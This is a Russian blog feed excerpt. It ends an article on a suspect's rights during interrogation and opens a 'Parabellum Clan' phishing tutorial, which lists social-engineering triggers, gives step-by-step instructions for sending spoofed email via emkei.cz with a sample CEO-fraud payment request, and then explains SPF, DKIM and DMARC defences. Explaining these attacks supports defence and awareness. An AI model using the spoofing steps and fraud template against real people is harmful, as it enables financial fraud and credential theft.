    &lt;/ul&gt;
    &lt;li id=&quot;1ZQb&quot;&gt;&lt;strong&gt;О — Отношение к делу&lt;/strong&gt;&lt;/li&gt;
    &lt;ul id=&quot;CyR0&quot;&gt;
      &lt;li id=&quot;E0XP&quot;&gt;&lt;strong&gt;Суть принципа&lt;/strong&gt;: Отвечайте только на те вопросы, которые имеют прямое отношение к делу. Это позволяет избежать ловушек и не предоставлять следователю лишнюю информацию, которая может быть использована против вас.&lt;/li&gt;
      &lt;li id=&quot;gAKo&quot;&gt;&lt;strong&gt;Почему это важно&lt;/strong&gt;: Наводящие и косвенные вопросы, которые следователь может задать, могут создать у вас ощущение, что необходимо ответить на все. Однако вы вправе не отвечать на вопросы, которые не относятся напрямую к делу или являются наводящими.&lt;/li&gt;
      &lt;li id=&quot;PHYT&quot;&gt;&lt;strong&gt;Пример&lt;/strong&gt;: Следователь спрашивает: «Знакомы ли вы с человеком, который находился на месте происшествия?» Если ваш ответ подтвердит знакомство, это может быть использовано для построения логической цепочки против вас. Вы вправе не отвечать, если не уверены, что это напрямую касается вашего дела.&lt;/li&gt;
    &lt;/ul&gt;
    &lt;li id=&quot;CTO3&quot;&gt;&lt;strong&gt;Д — Допустимость&lt;/strong&gt;&lt;/li&gt;
    &lt;ul id=&quot;x3rW&quot;&gt;
      &lt;li id=&quot;9jxu&quot;&gt;&lt;strong&gt;Суть принципа&lt;/strong&gt;: Вы вправе не отвечать на вопросы, которые кажутся вам неподобающими или неприемлемыми, в том числе касающимися моральных, этических или личных аспектов.&lt;/li&gt;
      &lt;li id=&quot;fzrl&quot;&gt;&lt;strong&gt;Почему это важно&lt;/strong&gt;: Вопросы личного характера, которые не имеют отношения к делу, но могут поставить вас в компрометирующее положение, часто используются для оказания психологического давления. Вы имеете полное право отказаться отвечать на них, ссылаясь на их недопустимость.&lt;/li&gt;
      &lt;li id=&quot;C0eD&quot;&gt;&lt;strong&gt;Пример&lt;/strong&gt;: Следователь спрашивает о ваших личных предпочтениях или взаимоотношениях, не имеющих отношения к делу. Вы можете прямо указать, что считаете такие вопросы неуместными и отказываетесь на них отвечать.&lt;/li&gt;
    &lt;/ul&gt;
  &lt;/ol&gt;
  &lt;h4 id=&quot;vfVI&quot;&gt;Как использовать систему &amp;quot;П.Л.О.Д.&amp;quot; на практике&lt;/h4&gt;
  &lt;p id=&quot;ETTt&quot;&gt;Эти четыре принципа позволяют сохранить объективность и не попасть в ловушки, расставленные следователем. Понимание системы &amp;quot;П.Л.О.Д.&amp;quot; дает возможность вести себя на допросе уверенно и контролировать свои ответы. В случае попыток оказать давление или манипуляций вы сможете четко аргументировать отказ отвечать на те или иные вопросы, ссылаясь на свои права.&lt;/p&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h2 id=&quot;XywD&quot; data-align=&quot;center&quot;&gt;12. Советы для подготовки к допросу&lt;/h2&gt;
  &lt;/section&gt;
  &lt;p id=&quot;mSta&quot;&gt;Допрос — это не просто формальность, а часть следственного процесса, где любая неосторожная фраза может обернуться против вас. Чтобы защитить свои права и не дать следователю использовать ваши слова против вас или других, необходимо заранее подготовиться и правильно вести себя.&lt;/p&gt;
  &lt;h4 id=&quot;UolO&quot;&gt;Основные рекомендации&lt;/h4&gt;
  &lt;ol id=&quot;Prty&quot;&gt;
    &lt;li id=&quot;z0zx&quot;&gt;&lt;strong&gt;Контроль над информацией: говорите только за себя&lt;/strong&gt;&lt;/li&gt;
    &lt;ul id=&quot;vajo&quot;&gt;
      &lt;li id=&quot;hAkf&quot;&gt;Никогда не делайте догадок о других или не обсуждайте их участие, даже в незначительных действиях. Любые слова о других людях — это потенциальные зацепки для следствия. Говорите только о фактах, которые непосредственно касаются вас, и избегайте обобщений и предположений.&lt;/li&gt;
    &lt;/ul&gt;
    &lt;li id=&quot;Hknc&quot;&gt;&lt;strong&gt;Четкость и краткость ответов&lt;/strong&gt;&lt;/li&gt;
    &lt;ul id=&quot;pds0&quot;&gt;
      &lt;li id=&quot;M3AP&quot;&gt;Отвечайте на вопросы по существу и избегайте длинных объяснений. Слишком детальные ответы часто приводят к непреднамеренным противоречиям, которые следователь может использовать для дальнейших вопросов. Краткость помогает сохранять контроль и не дает лишней информации.&lt;/li&gt;
    &lt;/ul&gt;
    &lt;li id=&quot;KuSM&quot;&gt;&lt;strong&gt;Избегайте эмоциональных реакций&lt;/strong&gt;&lt;/li&gt;
    &lt;ul id=&quot;M9ID&quot;&gt;
      &lt;li id=&quot;MZrk&quot;&gt;Следователи могут использовать психологические приемы, чтобы спровоцировать на эмоциональные ответы. Сохраняйте спокойствие и выдержку, даже если вопросы ставят вас в сложное положение. Пауза перед ответом поможет обдумать слова и снизить напряжение.&lt;/li&gt;
    &lt;/ul&gt;
    &lt;li id=&quot;qhg9&quot;&gt;&lt;strong&gt;Требуйте фиксации всех вопросов в протоколе&lt;/strong&gt;&lt;/li&gt;
    &lt;ul id=&quot;CULO&quot;&gt;
      &lt;li id=&quot;EN6t&quot;&gt;Все сказанное на допросе должно быть задокументировано. Если следователь не записывает вопрос или ответ в протокол, вы вправе на него не отвечать. Фиксация каждого вопроса и ответа защищает от перекручиваний ваших слов.&lt;/li&gt;
    &lt;/ul&gt;
    &lt;li id=&quot;CSDU&quot;&gt;&lt;strong&gt;Избегайте предположений и догадок&lt;/strong&gt;&lt;/li&gt;
    &lt;ul id=&quot;y0Fa&quot;&gt;
      &lt;li id=&quot;hsZm&quot;&gt;Не пытайтесь рассуждать, «как могло быть» или «кто мог быть замешан». Ваша задача — отвечать на вопросы о том, что вы знаете непосредственно. Предположения могут быть расценены как косвенные доказательства, и их использование против вас не всегда можно предотвратить.&lt;/li&gt;
    &lt;/ul&gt;
    &lt;li id=&quot;JJmq&quot;&gt;&lt;strong&gt;Не позволяйте следователю задавать наводящие вопросы&lt;/strong&gt;&lt;/li&gt;
    &lt;ul id=&quot;BsPm&quot;&gt;
      &lt;li id=&quot;nBZ6&quot;&gt;Если следователь использует наводящие вопросы, требуйте их переформулировки. Следователь не имеет права формулировать вопрос так, чтобы ответ подсказывал информацию или подтверждал обвинение.&lt;/li&gt;
    &lt;/ul&gt;
    &lt;li id=&quot;Gwu5&quot;&gt;&lt;strong&gt;Подготовьтесь психологически к давлению&lt;/strong&gt;&lt;/li&gt;
    &lt;ul id=&quot;7mFb&quot;&gt;
      &lt;li id=&quot;egVG&quot;&gt;Помните, что допрос — это испытание на выдержку. Если вы сталкиваетесь с агрессивными вопросами или давлением, сохраняйте спокойствие и вежливо напоминайте о своих правах. В случае серьезного психологического давления можно указать на это в протоколе или потребовать присутствия адвоката.&lt;/li&gt;
    &lt;/ul&gt;
    &lt;li id=&quot;t5DW&quot;&gt;&lt;strong&gt;Избегайте ответов на вопросы, которые касаются ваших убеждений или взглядов&lt;/strong&gt;&lt;/li&gt;
    &lt;ul id=&quot;0dDG&quot;&gt;
      &lt;li id=&quot;yQ0e&quot;&gt;Политические взгляды или социальные убеждения часто используются для создания профиля допрашиваемого. Не обсуждайте эти аспекты и сосредоточьтесь только на фактах, которые касаются конкретного дела.&lt;/li&gt;
    &lt;/ul&gt;
    &lt;li id=&quot;8XNF&quot;&gt;&lt;strong&gt;Проверяйте протокол перед подписанием&lt;/strong&gt;&lt;/li&gt;
    &lt;ul id=&quot;aqVj&quot;&gt;
      &lt;li id=&quot;DSGE&quot;&gt;Обязательно проверяйте все записи в протоколе на точность и полноту. Если вы обнаружили искажения или пропуски, требуйте их исправления или внесите замечания.&lt;/li&gt;
    &lt;/ul&gt;
    &lt;li id=&quot;oTXf&quot;&gt;&lt;strong&gt;Не соглашайтесь на предложения о «сотрудничестве»&lt;/strong&gt;&lt;/li&gt;
    &lt;ul id=&quot;iMXv&quot;&gt;
      &lt;li id=&quot;T1Uc&quot;&gt;Следователи могут предлагать «сотрудничество» в обмен на смягчение наказания. Прежде чем обсуждать такие предложения, важно проконсультироваться с юристом, чтобы не сделать шагов, которые могут усложнить вашу защиту.&lt;/li&gt;
    &lt;/ul&gt;
  &lt;/ol&gt;
  &lt;hr /&gt;
  &lt;p id=&quot;3v8N&quot;&gt;Наш канал: &lt;a href=&quot;https://t.me/+eATHVyrDVPUwYzk8&quot; target=&quot;_blank&quot;&gt;https://t.me/+eATHVyrDVPUwYzk8&lt;/a&gt;&lt;br /&gt;Наш чат: &lt;a href=&quot;https://t.me/+hDPQsUT7YEljNzc8&quot; target=&quot;_blank&quot;&gt;https://t.me/+hDPQsUT7YEljNzc8&lt;/a&gt;&lt;/p&gt;

</content></entry><entry><id>parabellum_clan:phishing_2025</id><link rel="alternate" type="text/html" href="https://teletype.in/@parabellum_clan/phishing_2025?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=parabellum_clan"></link><title>Охота на доверие: фишинг в современном мире</title><published>2025-06-17T09:33:09.296Z</published><updated>2025-06-17T09:33:09.296Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img1.teletype.in/files/00/98/0098a47e-f6aa-4a77-a50b-310b43d88ab7.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://img2.teletype.in/files/17/b5/17b54504-3a53-4ff6-89ce-164488d828f0.jpeg&quot;&gt;Доброго дня, дамы и господа, с вами, как всегда, Parabellum Clan! Каждый из вас, наверняка, задумывался, как было бы здорово перехватить чужую электронную почту или отправить поддельное письмо от имени известной компании, а может, даже обойти двухфакторную аутентификацию, как в шпионских фильмах. Но сегодня мы расскажем и покажем, как это работает в реальности, на примере реальных техник, которые используют хакеры для фишинга и подмены почты!</summary><content type="html">
  &lt;figure id=&quot;odX6&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/17/b5/17b54504-3a53-4ff6-89ce-164488d828f0.jpeg&quot; width=&quot;3072&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;r3Dy&quot;&gt;Доброго дня, дамы и господа, с вами, как всегда, &lt;a href=&quot;https://t.me/+e21xPjwEK343YTZk&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;Parabellum Clan&lt;/strong&gt;&lt;/a&gt;! Каждый из вас, наверняка, задумывался, как было бы здорово перехватить чужую электронную почту или отправить поддельное письмо от имени известной компании, а может, даже обойти двухфакторную аутентификацию, как в шпионских фильмах. Но сегодня мы расскажем и покажем, как это работает в реальности, на примере реальных техник, которые используют хакеры для фишинга и подмены почты!&lt;/p&gt;
  &lt;p id=&quot;xRCC&quot;&gt;&lt;strong&gt;Содержание:&lt;/strong&gt;&lt;br /&gt;&lt;a href=&quot;/@parabellumclan/phishing#OaqE&quot;&gt;1. HUMINT&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;/@parabellumclan/phishing#v92b&quot;&gt;2. Отправка поддельных писем с emkei.cz&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;/@parabellumclan/phishing#Sjz1&quot;&gt;3. Противодействуем отправке фишинговых писем&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;/@parabellumclan/phishing#9X99&quot;&gt;4. Обход SPF&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;/@parabellumclan/phishing#SIKi&quot;&gt;5. Несоответствие Return-Path&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;/@parabellumclan/phishing#N0fy&quot;&gt;6. Дипфейки и вишинг&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;/@parabellumclan/phishing#997i&quot;&gt;7. Обход 2FA&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;/@parabellumclan/phishing#7BIV&quot;&gt;8. Омографические атаки&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;/@parabellumclan/phishing#I8sD&quot;&gt;9. Тайпсквоттинг&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;/@parabellumclan/phishing#AVQl&quot;&gt;10. Фишинговые страницы на уровне OS&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;/@parabellumclan/phishing#9BNI&quot;&gt;11. Wi-Fi фишинг&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;/@parabellumclan/phishing#FbzY&quot;&gt;12. Капча на фишинге?&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;/@parabellumclan/phishing#U2Ch&quot;&gt;13. Поиск доменов с истёкшим сроком&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;/@parabellumclan/phishing#CgD3&quot;&gt;14. Перенаправление DNS&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;/@parabellumclan/phishing#x4qK&quot;&gt;15. Fast Flux для хакеров&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;/@parabellumclan/phishing#kaSK&quot;&gt;16. Загрузка &amp;quot;доверенного&amp;quot; файла&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;/@parabellumclan/phishing#U3Vt&quot;&gt;17. Символы RTLO в фишинге&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;/@parabellumclan/phishing#p8HF&quot;&gt;18. Полезные плюшки для работы с фишингом&lt;/a&gt;&lt;/p&gt;
  &lt;hr /&gt;
  &lt;p id=&quot;qqAz&quot;&gt;&lt;code&gt;*Сегодня без картинок, нет времени столько генерировать...&lt;/code&gt;&lt;/p&gt;
  &lt;hr /&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h2 id=&quot;OaqE&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;1. HUMINT&lt;/strong&gt;&lt;/h2&gt;
  &lt;/section&gt;
  &lt;p id=&quot;q8gH&quot;&gt;&lt;strong&gt;Человеческая разведка (HUMINT) и социальная инженерия&lt;/strong&gt; в фишинге основываются на манипуляции эмоциями и поведением людей, чтобы обманом заставить их раскрыть конфиденциальную информацию. Фишеры используют HUMINT для сбора персональных данных, таких как должности, интересы и связи, чтобы создать целенаправленные атаки. Социальная инженерия усиливает эти атаки, используя эмоциональные триггеры, такие как страх, срочность, доверие и жадность. Эти техники манипулируют людьми, заставляя их принимать импульсивные решения, такие как нажатие на вредоносную ссылку или передача своих учетных данных, убеждая их в том, что запрос является законным или срочным.&lt;/p&gt;
  &lt;p id=&quot;5fCG&quot;&gt;&lt;em&gt;Эмоции и их распознавание играют ключевую роль&lt;/em&gt; как для хакеов. Мы можем наблюдать такие эмоции, как страх, замешательство или облегчение, чтобы корректировать свою тактику, делая свою историю более убедительной. С другой стороны, способность распознавать эмоциональные реакции может помочь специалистам по ИБ обучать сотрудников оценивать подозрительные запросы с помощью критического мышления.&lt;/p&gt;
  &lt;p id=&quot;otyq&quot;&gt;&lt;strong&gt;Шпоры для понимания: Сценарии фишинга и эмоциональные триггеры&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;6Jsc&quot;&gt;&lt;strong&gt;1. Страх/Тревога&lt;/strong&gt;&lt;/p&gt;
  &lt;ul id=&quot;o9Vs&quot;&gt;
    &lt;li id=&quot;cN98&quot;&gt;&lt;strong&gt;Сценарий:&lt;/strong&gt; &lt;em&gt;&amp;quot;Ваш аккаунт был взломан. Срочно сбросьте пароль!&amp;quot;&lt;/em&gt;&lt;/li&gt;
    &lt;li id=&quot;Hlka&quot;&gt;&lt;strong&gt;Эмоциональный триггер:&lt;/strong&gt; Страх потерять доступ или подвергнуть свои данные риску.&lt;/li&gt;
    &lt;li id=&quot;9dRt&quot;&gt;&lt;strong&gt;Реакция:&lt;/strong&gt; Жертва в панике нажимает на вредоносную ссылку, не проверяя источник.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;DAaT&quot;&gt;&lt;strong&gt;2. Любопытство&lt;/strong&gt;&lt;/p&gt;
  &lt;ul id=&quot;ktgD&quot;&gt;
    &lt;li id=&quot;cTd0&quot;&gt;&lt;strong&gt;Сценарий: &lt;/strong&gt;&lt;em&gt;&amp;quot;Вы получили конфиденциальный документ. Откройте для просмотра.&amp;quot;&lt;/em&gt;&lt;/li&gt;
    &lt;li id=&quot;MTAT&quot;&gt;&lt;strong&gt;Эмоциональный триггер:&lt;/strong&gt; Интерес, вызванный загадкой или эксклюзивностью.&lt;/li&gt;
    &lt;li id=&quot;cbLl&quot;&gt;&lt;strong&gt;Реакция: &lt;/strong&gt;Жертва открывает вложение, которое устанавливает вредоносное ПО.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;EVsb&quot;&gt;&lt;strong&gt;3. Срочность&lt;/strong&gt;&lt;/p&gt;
  &lt;ul id=&quot;aLtL&quot;&gt;
    &lt;li id=&quot;4i3D&quot;&gt;&lt;strong&gt;Сценарий:&lt;/strong&gt; &lt;em&gt;&amp;quot;Оплатите сейчас, чтобы избежать штрафов за просрочку!&amp;quot;&lt;/em&gt;&lt;/li&gt;
    &lt;li id=&quot;1XyI&quot;&gt;&lt;strong&gt;Эмоциональный триггер: &lt;/strong&gt;Давление действовать быстро без проверки.&lt;/li&gt;
    &lt;li id=&quot;FDll&quot;&gt;&lt;strong&gt;Реакция:&lt;/strong&gt; Жертва торопится и вводит данные платежной карты на фишинговом сайте.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;jI4d&quot;&gt;&lt;strong&gt;4. Доверие/Авторитет&lt;/strong&gt;&lt;/p&gt;
  &lt;ul id=&quot;y2W6&quot;&gt;
    &lt;li id=&quot;8oZ1&quot;&gt;&lt;strong&gt;Сценарий:&lt;/strong&gt;&lt;em&gt; &amp;quot;Это ваш начальник. Срочно переведите деньги на этот счет.&amp;quot;&lt;/em&gt;&lt;/li&gt;
    &lt;li id=&quot;DCLS&quot;&gt;&lt;strong&gt;Эмоциональный триггер:&lt;/strong&gt; Уважение к авторитету, страх ослушаться.&lt;/li&gt;
    &lt;li id=&quot;0e6s&quot;&gt;&lt;strong&gt;Реакция:&lt;/strong&gt; Жертва, полагая, что запрос исходит от начальства, выполняет его, не задавая вопросов.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;G31i&quot;&gt;&lt;strong&gt;5. Жадность/Восторг&lt;/strong&gt;&lt;/p&gt;
  &lt;ul id=&quot;XytX&quot;&gt;
    &lt;li id=&quot;hvDF&quot;&gt;&lt;strong&gt;Сценарий:&lt;/strong&gt; &lt;em&gt;&amp;quot;Вы выиграли подарочную карту на 1000$! Нажмите, чтобы получить приз.&amp;quot;&lt;/em&gt;&lt;/li&gt;
    &lt;li id=&quot;V4SD&quot;&gt;&lt;strong&gt;Эмоциональный триггер: &lt;/strong&gt;Желание получить награду или финансовую выгоду.&lt;/li&gt;
    &lt;li id=&quot;xpLU&quot;&gt;&lt;strong&gt;Реакция:&lt;/strong&gt; Жертва предоставляет личную информацию, чтобы получить несуществующий приз.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h2 id=&quot;v92b&quot; data-align=&quot;center&quot;&gt;2. Отправка поддельных писем с emkei.cz&lt;/h2&gt;
  &lt;/section&gt;
  &lt;p id=&quot;uKPW&quot;&gt;&lt;strong&gt;&lt;a href=&quot;https://emkei.cz/&quot; target=&quot;_blank&quot;&gt;emkei.cz&lt;/a&gt;&lt;/strong&gt; — это онлайн-инструмент, позволяющий отправлять поддельные электронные письма, просто заполнив форму. Этот инструмент может быть использован в фишинговых атаках и атаках социальной инженерии, так как позволяет подделать поле &amp;quot;От&amp;quot;, создавая иллюзию, что письмо пришло от доверенного или официального источника. Понимание того, как злоумышленники используют такие инструменты, как Emkei.cz, помогает в разработке эффективных мер защиты.&lt;/p&gt;
  &lt;h3 id=&quot;HOLG&quot;&gt;&lt;strong&gt;Отправка поддельного письма с помощью Emkei.cz включает несколько простых шагов:&lt;/strong&gt;&lt;/h3&gt;
  &lt;p id=&quot;60eW&quot;&gt;1. &lt;strong&gt;Доступ к сайту:&lt;/strong&gt;&lt;/p&gt;
  &lt;ul id=&quot;0ULS&quot;&gt;
    &lt;li id=&quot;mvWK&quot;&gt;Перейдите на сайт &lt;a href=&quot;https://emkei.cz/&quot; target=&quot;_blank&quot;&gt;emkei.cz&lt;/a&gt; через браузер&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;nIHC&quot;&gt;2. &lt;strong&gt;Заполнение формы:&lt;/strong&gt;&lt;/p&gt;
  &lt;ul id=&quot;gn06&quot;&gt;
    &lt;li id=&quot;Iy7y&quot;&gt;&lt;strong&gt;От (From):&lt;/strong&gt; Введите поддельный адрес отправителя, например, &lt;em&gt;ceo@legitcompany.com&lt;/em&gt;&lt;/li&gt;
    &lt;li id=&quot;Xh8c&quot;&gt;&lt;strong&gt;Кому (To): &lt;/strong&gt;Укажите email жертвы, например, &lt;em&gt;victim@targetdomain.com&lt;/em&gt;&lt;/li&gt;
    &lt;li id=&quot;sqvP&quot;&gt;&lt;strong&gt;Тема (Subject):&lt;/strong&gt; Придумайте любую тему, например, &lt;em&gt;&amp;quot;Срочно: требуется оплата&amp;quot;&lt;/em&gt;&lt;/li&gt;
    &lt;li id=&quot;Mo2Y&quot;&gt;&lt;strong&gt;Сообщение (Message):&lt;/strong&gt; Напишите текст письма, который может выглядеть так:&lt;/li&gt;
  &lt;/ul&gt;
  &lt;pre id=&quot;RwOT&quot;&gt;Уважаемый Антон Гандурасович,

Пожалуйста, переведите 5000 долларов на указанный счет. Это срочно!

С уважением,
Ваш Насяльника.&lt;/pre&gt;
  &lt;p id=&quot;lYJC&quot;&gt;3. &lt;strong&gt;Настройки SMTP:&lt;/strong&gt; Можно использовать настройки по умолчанию или настроить собственный SMTP-сервер для еще большего скрытия следов.&lt;/p&gt;
  &lt;p id=&quot;6PlJ&quot;&gt;4. &lt;strong&gt;Вложение (Attachment): &lt;/strong&gt;При желании можно прикрепить файлы (которые могут содержать вредоносное ПО или другие зловредные данные).&lt;/p&gt;
  &lt;p id=&quot;4AR2&quot;&gt;5. &lt;strong&gt;Отправка письма: &lt;/strong&gt;После заполнения формы нажмите кнопку &amp;quot;Отправить&amp;quot;, и поддельное письмо будет отправлено жертве.&lt;/p&gt;
  &lt;p id=&quot;E6JH&quot;&gt;Простота использования emkei.cz делает его привлекательным для начинающих хакеров. Для отправки фишинговых писем не требуются технические навыки, а письма могут выглядеть достаточно убедительно для жертв.&lt;/p&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h2 id=&quot;Sjz1&quot; data-align=&quot;center&quot;&gt;3. Противодействуем отправке фишинговых писем&lt;/h2&gt;
  &lt;/section&gt;
  &lt;p id=&quot;pfn0&quot;&gt;Предотвращение подделки писем, таких как те, что отправляются через Emkei.cz, требует многослойной стратегии защиты, сосредоточенной на методах аутентификации электронной почты и мониторинге.&lt;/p&gt;
  &lt;h3 id=&quot;celP&quot;&gt;&lt;strong&gt;1. Настройте SPF (Sender Policy Framework)&lt;/strong&gt;&lt;/h3&gt;
  &lt;p id=&quot;tZZ2&quot;&gt;&lt;strong&gt;SPF&lt;/strong&gt; — это запись в DNS, которая указывает, какие почтовые серверы имеют право отправлять письма от имени вашего домена. При правильной настройке это блокирует неавторизованные серверы (например, сервера Emkei.cz) от отправки писем от вашего домена.&lt;/p&gt;
  &lt;p id=&quot;qJJd&quot;&gt;&lt;strong&gt;Как добавить запись SPF:&lt;/strong&gt;&lt;/p&gt;
  &lt;ul id=&quot;31Jt&quot;&gt;
    &lt;li id=&quot;G0g0&quot;&gt;Добавьте следующее в настройки DNS вашего домена:&lt;/li&gt;
  &lt;/ul&gt;
  &lt;pre data-lang=&quot;bash&quot; id=&quot;aF4P&quot;&gt;example.com. IN TXT &amp;quot;v=spf1 ip4:192.0.2.1 -all&amp;quot;&lt;/pre&gt;
  &lt;ul id=&quot;GHyz&quot;&gt;
    &lt;li id=&quot;MFeF&quot;&gt;&lt;strong&gt;ip4:192.0.2.1&lt;/strong&gt;: указывает IP-адрес авторизованного почтового сервера&lt;/li&gt;
    &lt;li id=&quot;5CQO&quot;&gt;&lt;strong&gt;-all&lt;/strong&gt;: отклоняет все письма, не поступившие от авторизованных IP-адресов&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;Ng64&quot;&gt;&lt;strong&gt;Проверьте запись SPF:&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;WslL&quot;&gt;Используйте онлайн-инструменты, такие как &lt;strong&gt;MXToolbox&lt;/strong&gt;, или командные строки для проверки записи SPF:&lt;/p&gt;
  &lt;pre data-lang=&quot;bash&quot; id=&quot;g0Ms&quot;&gt;dig txt example.com&lt;/pre&gt;
  &lt;p id=&quot;dq9N&quot;&gt;Убедитесь, что запись SPF настроена правильно и включает все законные почтовые серверы вашего домена.&lt;/p&gt;
  &lt;h3 id=&quot;ApzT&quot;&gt;&lt;strong&gt;2. Настройте DKIM (DomainKeys Identified Mail)&lt;/strong&gt;&lt;/h3&gt;
  &lt;p id=&quot;RmY3&quot;&gt;DKIM добавляет криптографическую подпись к заголовкам исходящих писем. Если кто-то попытается отправить письмо от вашего домена без этой подписи (как это делает &lt;u&gt;Emkei.cz&lt;/u&gt;), оно будет отмечено.&lt;/p&gt;
  &lt;p id=&quot;DwUD&quot;&gt;&lt;strong&gt;Шаги по настройке DKIM:&lt;/strong&gt;&lt;/p&gt;
  &lt;ul id=&quot;ZLgD&quot;&gt;
    &lt;li id=&quot;5mcM&quot;&gt;Создайте пару ключей DKIM (открытый и закрытый ключи)&lt;/li&gt;
    &lt;li id=&quot;PXHN&quot;&gt;Опубликуйте открытый ключ в виде DNS TXT записи для вашего домена&lt;/li&gt;
    &lt;li id=&quot;zgWK&quot;&gt;Настройте ваш почтовый сервер для подписывания исходящих писем с помощью закрытого ключа&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;gabQ&quot;&gt;&lt;strong&gt;Пример записи DKIM в DNS:&lt;/strong&gt;&lt;/p&gt;
  &lt;pre data-lang=&quot;bash&quot; id=&quot;rJZe&quot;&gt;default._domainkey.example.com. IN TXT &amp;quot;v=DKIM1; k=rsa; p=ваш_публичный_ключ&amp;quot;&lt;/pre&gt;
  &lt;p id=&quot;RW94&quot;&gt;&lt;strong&gt;Проверьте запись DKIM:&lt;/strong&gt;&lt;/p&gt;
  &lt;pre data-lang=&quot;bash&quot; id=&quot;qwCe&quot;&gt;dig txt default._domainkey.example.com&lt;/pre&gt;
  &lt;p id=&quot;JMfK&quot;&gt;Проверьте правильность настройки DKIM с помощью инструментов, таких как &lt;a href=&quot;https://dmarcian.com/&quot; target=&quot;_blank&quot;&gt;dmarcian.com&lt;/a&gt;.&lt;/p&gt;
  &lt;h3 id=&quot;Uoi0&quot;&gt;&lt;strong&gt;3. Настройте DMARC (Domain-based Message Authentication, Reporting, and Conformance)&lt;/strong&gt;&lt;/h3&gt;
  &lt;p id=&quot;oi5s&quot;&gt;&lt;strong&gt;DMARC&lt;/strong&gt; позволяет владельцам доменов указывать, как серверы-получатели должны обрабатывать письма, не прошедшие проверку SPF и DKIM (например, отклонять или помещать в карантин).&lt;/p&gt;
  &lt;p id=&quot;wG5d&quot;&gt;&lt;strong&gt;Шаги по настройке DMARC:&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;wXOV&quot;&gt;&lt;strong&gt;Добавьте следующую запись в DNS TXT:&lt;/strong&gt;&lt;/p&gt;
  &lt;pre data-lang=&quot;bash&quot; id=&quot;Cl0l&quot;&gt;_dmarc.example.com. IN TXT &amp;quot;v=DMARC1; p=reject; rua=mailto:dmarc-reports@example.com; ruf=mailto:forensic-reports@example.com&amp;quot;&lt;/pre&gt;
  &lt;ul id=&quot;Z7Uj&quot;&gt;
    &lt;li id=&quot;2klg&quot;&gt;&lt;strong&gt;p=reject:&lt;/strong&gt; письма, не прошедшие проверки DMARC, будут отклонены&lt;/li&gt;
    &lt;li id=&quot;weod&quot;&gt;&lt;strong&gt;rua:&lt;/strong&gt; агрегированные отчеты будут отправляться на dmarc- &lt;em&gt;reports@example.com&lt;/em&gt;&lt;/li&gt;
    &lt;li id=&quot;R3kF&quot;&gt;&lt;strong&gt;ruf:&lt;/strong&gt; форензические отчеты будут отправляться на &lt;em&gt;forensic-reports@example.com&lt;/em&gt;&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;0J8n&quot;&gt;&lt;strong&gt;Проверьте запись DMARC:&lt;/strong&gt;&lt;/p&gt;
  &lt;pre data-lang=&quot;bash&quot; id=&quot;tOU3&quot;&gt;dig txt _dmarc.example.com&lt;/pre&gt;
  &lt;p id=&quot;Rbtq&quot;&gt;Убедитесь, что ваша политика DMARC правильно опубликована и признана серверами-получателями.&lt;/p&gt;
  &lt;h3 id=&quot;QAGK&quot;&gt;&lt;strong&gt;4. Используйте фильтры электронной почты и решения для обеспечения безопасности&lt;/strong&gt;&lt;/h3&gt;
  &lt;p id=&quot;MX7A&quot;&gt;Фильтрация электронной почты может автоматически блокировать или помещать в карантин подозрительные письма, в том числе отправленные через Emkei.cz.&lt;/p&gt;
  &lt;ul id=&quot;XoPN&quot;&gt;
    &lt;li id=&quot;k68H&quot;&gt;&lt;strong&gt;Используйте шлюзы безопасности для электронной почты:&lt;/strong&gt; Решения, такие как Proofpoint, Mimecast или Microsoft Defender для Office 365, могут обнаруживать и блокировать поддельные письма на основе поведенческих паттернов и аномалий.&lt;/li&gt;
    &lt;li id=&quot;RCBJ&quot;&gt;&lt;strong&gt;Включите фильтры против подмены: &lt;/strong&gt;Большинство корпоративных систем электронной почты (например, Google Workspace или Microsoft Exchange) позволяют по умолчанию включить обнаружение и фильтрацию подмены.&lt;/li&gt;
